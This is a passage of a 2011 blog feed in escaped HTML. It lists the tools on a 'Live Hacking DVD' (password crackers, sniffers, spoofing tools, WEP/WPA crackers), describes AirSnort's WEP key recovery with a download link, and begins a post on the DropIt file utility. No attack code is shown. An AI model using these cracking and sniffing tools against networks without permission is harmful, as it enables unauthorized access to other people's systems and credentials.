&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;&amp;nbsp;&lt;a href=&quot;http://sourceforge.net/projects/livehacking/files/Live%20Hacking/livehackingdvd.1.3a.tdc.iso/download&quot;&gt;Click here to Download&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br style=&quot;font-family: Arial,Helvetica,sans-serif;&quot; /&gt;&lt;b&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;Application List &lt;/span&gt;&lt;/b&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;/div&gt;&lt;br style=&quot;font-family: Arial,Helvetica,sans-serif;&quot; /&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;The Live Hacking DVD is packed with tools and utilities for ethical hacking, penetration testing and countermeasure verification. The DVD includes hacking tools for DNS, reconnaissance, foot-printing (gathering information about computers on the network), password cracking, network sniffing, spoofing (or masquerading) and wireless networking utilities. &lt;/span&gt;&lt;/div&gt;&lt;br style=&quot;font-family: Arial,Helvetica,sans-serif;&quot; /&gt;&lt;b&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;Here is a list of the hacking tools you can find on the Live Hacking DVD/CD: &lt;/span&gt;&lt;/b&gt;&lt;br style=&quot;font-family: Arial,Helvetica,sans-serif;&quot; /&gt;&lt;br style=&quot;font-family: Arial,Helvetica,sans-serif;&quot; /&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt; &lt;b&gt;Reconnaissance (and DNS) &lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;&lt;/div&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;Dig – DNS lookup utility&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;DNSMap – DNS mapping is a mechanism which allows hosts on a private LAN to use DNS Services even if the address of an actual DNS Server is unknown.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;DNSTracer – Trace DNS queries to the source&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;DNSWalk – Checks DNS zone information using nameserver lookups&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;Netmask – Helps determine network masks&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;Relay Scanner – This program is used to test SMTP servers for Relaying problems&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;TCPTraceroute – Traceroute implementation using TCP packets&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;Firewalk – Firewalk is a network auditing tool that attempts to determine what transport protocols a given gateway will pass. &lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;Foot-printing&lt;/span&gt;&lt;/b&gt;&lt;br style=&quot;font-family: Arial,Helvetica,sans-serif;&quot; /&gt; &lt;/div&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;Amap – Performs fast and reliable application protocol detection, independent of the TCP/UDP port they are being bound to.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;Curl – Get a file from an HTTP, HTTPS or FTP server&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;Fping – Sends ICMP ECHO_REQUEST packets to network hosts&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;Hping3 – Active Network Smashing Tool&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;HTTprint – A web server fingerprinting tool&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;Ike-Scan – IPsec VPN scanning, fingerprinting and testing tool&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;MetoScan – HTTP method scanner&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;Namp – The Network Mapper&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;Netcat – TCP/IP swiss army knife&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;P0f – Passive OS fingerprinting and masquerade detection utility&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;Zenmap – The Network Mapper Front End &lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;Password Cracking&lt;/span&gt;&lt;/b&gt;&lt;br style=&quot;font-family: Arial,Helvetica,sans-serif;&quot; /&gt; &lt;/div&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;Chntpw – NT SAM password recovery utility&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;Rainbowcrack – Crack LM, MD5 and SHA1 hashes&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;THC PPTP Bruter – A brute forcing program against PPTP VPN endpoints (TCP port 1723)&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;VNCrack – Crack VNC passwords&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;John the ripper – A fast password cracker &lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;Network Sniffing &lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;DHCP Dump – DHCP packet dumper&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;Dsniff – Password sniffer&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;SSLDump – Dump SSL traffic on a network&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;Ntop – Displays top network users&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;Wireshark – Interactively dump and analyze network traffic &lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;Spoofing (or Masquerading)&lt;/span&gt;&lt;/b&gt;&lt;br style=&quot;font-family: Arial,Helvetica,sans-serif;&quot; /&gt; &lt;/div&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;File2cable – Sends a file as a raw ethernet frame&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;Netsed – Network packet streaming editor&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;Sing – Send ICMP Nasty Garbage packets to network hosts&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;TCPreplay – Replay network traffic stored in pcap files &lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;b&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;Wireless Networking Utilities&lt;/span&gt;&lt;/b&gt;&lt;br style=&quot;font-family: Arial,Helvetica,sans-serif;&quot; /&gt; &lt;/div&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;Aircrack-ng – Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;Kismet – Wireless sniffing and monitoring&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;THC Leap Cracker – The THC LEAP Cracker Tool suite contains tools to break the NTChallengeResponse encryption technique e.g. used by Cisco Wireless LEAP Authentication.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;WEPCrack – WEPCrack is an open source tool for breaking 802.11 WEP secret keys.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;WIDZ – Wireless Intrusion Detection System&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;Cowpatty – Brute-force dictionary attack against WPA-PSK &lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt; &lt;b&gt;Miscellaneous &lt;/b&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;/div&gt;&lt;ul style=&quot;text-align: left;&quot;&gt;&lt;li&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;GDB – The GNU Debugger.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;Hexdump – ASCII, decimal, hexadecimal and octal dump tool.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;Hexedit – View and edit file in hexadecimal or in ASCII&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;Wipe – Securely erase files&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: Arial,Helvetica,sans-serif;&quot;&gt;Madedit -Text/Hex Editor&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;div style=&quot;text-align: left;&quot;&gt;&lt;br style=&quot;font-family: Arial,Helvetica,sans-serif;&quot; /&gt; &lt;/div&gt;&lt;/div&gt;</description><link>http://pchackerz.blogspot.com/2011/08/live-hacking-dvd.html</link><author>noreply@blogger.com (paventhan)</author><thr:total>1</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3606538285743323210.post-2253635651016813405</guid><pubDate>Thu, 25 Aug 2011 05:30:00 +0000</pubDate><atom:updated>2011-08-24T22:35:05.106-07:00</atom:updated><title>WiFi (WLAN)  Hacker - Cracks Wep key</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;This is only for educational purpose not any other means &lt;span class=&quot;fullpost&quot;&gt;  &lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: white;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;AirSnort is a wireless LAN (WLAN) tool which recovers encryption keys. AirSnort operates by passively monitoring transmissions, computing the encryption key when enough packets have been gathered.&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: white; font-family: Arial, Helvetica, sans-serif;&quot;&gt;802.11b, using the Wired Equivalent Protocol (WEP), is crippled with numerous security flaws. Most damning of these is the weakness described in &quot;&lt;a href=&quot;http://www.drizzle.com/~aboba/IEEE/rc4_ksaproc.pdf&quot;&gt;&amp;nbsp;Weaknesses in the Key Scheduling Algorithm of RC4&amp;nbsp;&lt;/a&gt;&quot; by Scott Fluhrer, Itsik Mantin and Adi Shamir.&amp;nbsp;&lt;a href=&quot;http://www.isoc.org/isoc/conferences/ndss/02/proceedings/papers/stubbl.pdf&quot;&gt;Adam Stubblefield&lt;/a&gt;&amp;nbsp;was the first to implement this attack, but he has not made his software public. AirSnort, along with&amp;nbsp;&lt;a href=&quot;http://sourceforge.net/projects/wepcrack&quot;&gt;WEPCrack&lt;/a&gt;, which was released about the same time as AirSnort, are the first publicly available implementaions of this attack.&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: white;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: white;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;AirSnort requires approximately 5-10 million encrypted packets to be gathered. Once enough packets have been gathered, AirSnort can guess the encryption password in under a second.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: white;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: white;&quot;&gt;&lt;a href=&quot;http://sourceforge.net/projects/airsnort/files/airsnort/airsnort-0.2.7/airsnort-0.2.7.tar.gz/download&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;Click here to Download&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;</description><link>http://pchackerz.blogspot.com/2011/08/wifi-wlan-hacker-cracks-wep-key.html</link><author>noreply@blogger.com (paventhan)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3606538285743323210.post-2547226981263380834</guid><pubDate>Thu, 25 Aug 2011 05:26:00 +0000</pubDate><atom:updated>2011-08-24T22:26:51.631-07:00</atom:updated><title>Speed Up Your File Manager with DropIt</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;This is only for educational purpose not any other means&amp;nbsp;&lt;/span&gt;&lt;/div&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;We all use the file manager nearly every day to view, move and sort files/folders. Admittedly, the file manager is limited in its functionality, and doesn’t allow much for batch processing of files, or matching of patterns in file or folder names. So what if we turbocharged our standard file manager? We would have &lt;a href=&quot;http://sourceforge.net/projects/dropit&quot;&gt;DropIt&lt;/a&gt;!&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;a href=&quot;http://sourceforge.net/projects/dropit&quot;&gt;DropIt&lt;/a&gt; is a small Windows app that floats on your desktop, allowing you to drag and drop files and folders for batch processing. From &lt;a href=&quot;http://dropit.sourceforge.net/&quot;&gt;their site&lt;/a&gt;:&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;You can configure DropIt to do 9 different actions to your files and folders (Move, Copy, Compress, Extract, Rename, Open With, List, Delete and Ignore), filtering files by name, extension, location, size and/or date. You can even save sets of patterns in profiles and associate a profile to each desired folder, to scan monitored folders at a defined time interval.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;This software boasts a host of other features, such as logging, multi-language and Unicode support, password protection, and much more.&lt;/div&gt;&lt;div style=&quot;text-align: justify;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;background-color: white; line-height: 21px;&quot;&gt;&lt;span class=&quot;faq&quot; style=&quot;color: #031a4b; font-family: Verdana, Geneva, Arial, Helvetica, sans-serif; font-style: italic; font-weight: bold;&quot;&gt;FEATURES&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Verdana, Geneva, Arial, Helvetica, sans-serif;&quot;&gt;&amp;nbsp;&lt;span class=&quot;Apple-style-span&quot; style=&quot;border-color: initial; border-width: initial;&quot;&gt;&lt;img alt=&quot;-&quot; src=&quot;http://dropit.sourceforge.net/Page/tip.png&quot; style=&quot;border-bottom-style: none; border-color: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; position: relative; top: -1px; vertical-align: middle;&quot; /&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: Arial, Helvetica, sans-serif;&quot;&gt;&amp;nbsp;Process files and folders manually with Drag-and-Drop&lt;br /&gt;
&amp;nbsp;&lt;span class=&quot;Apple-style-span&quot; style=&quot;border-color: initial; border-width: initial;&quot;&gt;&lt;img alt=&quot;-&quot; src=&quot;http://dropit.sourceforge.net/Page/tip.png&quot; style=&quot;border-bottom-style: none; border-color: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial; position: relative; top: -1px; vertical-align: middle;&quot; /&gt;&lt;/span&gt;&amp;nbsp;Process files and folders automatically with Folder Monitoring&lt;br /&gt;
